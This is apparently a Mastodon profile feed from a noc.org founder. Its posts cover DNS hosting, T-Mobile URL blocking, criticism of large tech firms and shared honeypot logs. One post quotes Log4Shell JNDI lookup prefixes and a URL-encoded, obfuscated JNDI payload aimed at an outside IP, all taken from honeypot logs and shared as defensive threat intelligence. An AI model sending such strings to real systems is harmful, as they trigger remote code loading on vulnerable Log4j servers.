Pinned toot

Remember. If you want your profile to be public here:

noc.social/explore

You need to go to Preferences->Profile and check "List this account in the directory".

Otherwise it won't show.

Pinned toot

My 7yo: "When I grow up, I want to be just like my daddy. He doesn't work and just spends his day at the computer doing nothing."

T-Mobile Actively Censoring Certain URLs:

youtube.com/watch?v=U-HE6_F3tM

And not just those URLs via SMS. They are also blocking CleanBrowsing DoH url - without ever replying or giving us a valid reason.

${jndi:ldap://

${jndi:rmi://

${jndi:dns://

Another other protocol being actively used that I am missing? At least, only seeing those 3 on our honeypot logs:

reputation.noc.org/jndi-attack

Also some interesting obfuscation, I am assuming to bypass WAF and IDSs:

/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2F

We are sharing jndi (log4j) attack logs here:

reputation.noc.org/jndi-attack

Might be useful to find variation of attacks and IPs abusing it.

Daniel Cid boosted

@dcid @val @cleanbrowsing

Something really cool about this session is you can actually interact by sending in your questions ...

You can send them to:

livestudio@cloudflare.tv or calling (380) 333 - 5273

Had no idea that was a thing.. haha! Oh boy..

Show thread
Daniel Cid boosted

If you need some noise to help you fall asleep better..

Will be doing a session with @dcid and @val today at 11 PDT to talk about our work @cleanbrowsing and a bit of our backgrounds...

Daniel Cid boosted

1975: "Let's build the Internet, a network that can survive a nuclear war!"
2021: "Let's host everything on the server of this one discount bookshop!"

Daniel Cid boosted

I cannot stress enough how important it is to understand that Apple, Google, or Amazon can simply _decide_ to remove access to anything you've "purchased", including many physical goods (if they are internet-connected and running proprietary software), and you have absolutely no recourse.

Show thread
Daniel Cid boosted

Is it always really DNS? Does DNSSEC problems really make it a DNS problem? It's technically not DNS causing the issue.. or is it?

Either way, another great example of the pains we still see with DNSSEC after 24+ years and why it's worth asking..

is DNSSEC still a thing we should be doing?

ruben.is.verweg.com/blog/2021/

Daniel Cid boosted

Ubiquiti Developer Charged With Extortion, Causing 2020 “Breach”.

In January 2021, technology vendor Ubiquiti Inc. [NYSE:UI] disclosed that a breach at a third party cloud provider had exposed customer account credentials. In March, a Ubiquiti employee warned that the company had drastically understated the scope of the incident, and that the third-party cloud ...
krebsonsecurity.com/?p=57755

Fun day at Brighton today. One of the few places open for skiing/snowboarding on such warm season.

DNS Database Repository Search

Search the DNS repository of IP addresses, domains, and their records.

dnsrepo.noc.org/

*You can search for domains behind an IP address, or all sub domains for a specific domain. You can also do sub domain discovery, find domains behind a specific service and things like that.

Daniel Cid boosted

As if you needed any more reason not to trust big corporations..

Here are pieces of the latest unredacted complaint against Google.

My favorite section:

"Project NERA was Google’s original plan to create a closed ecosystem out of the open internet. Google documents reveal that Google’s motive was to “successfully mimic a walled garden across the open web [so] we can protect our margins.”

wptavern.com/unredacted-antitr

Do you know you can host the DNS server (aka Authoritative DNS) for your domain for only $1 per month with noc.org?

And if that domain is used by a non-profit or Mastodon instance, we will do it for free.

Fully anycast DNS with support for high availability domains, geoip, etc.

Reach out if you are interested. Direct registration:

my.noc.org/register

There is nothing more creepy than this Facebook announcement:

about.facebook.com/meta/

Yes, Facebook is now Meta.

Sharing some of our SSHD honeypot logs here:

reputation.noc.org/sshd-brute-

Which is integrated with the IP reputation + informational API.

Daniel Cid boosted

Guide guide on how you can use Dynamic DNS record with the NOC platform: noc.org/knowledge-base/add-dyn

Working on this IP reputation API:

reputation.noc.org/

Test it out and let me know if you find it useful somehow.

Gives basic information about an IP + details if we detected it involved on web spam, web attacks, sshd bruteforce, etc...

*in beta

Show more
Noc.Social

Open Source Social Network. Focused on technology, networking, linux, privacy and security, but open to anyone. Civil discourse, polite and open. Managed by the noc.org team.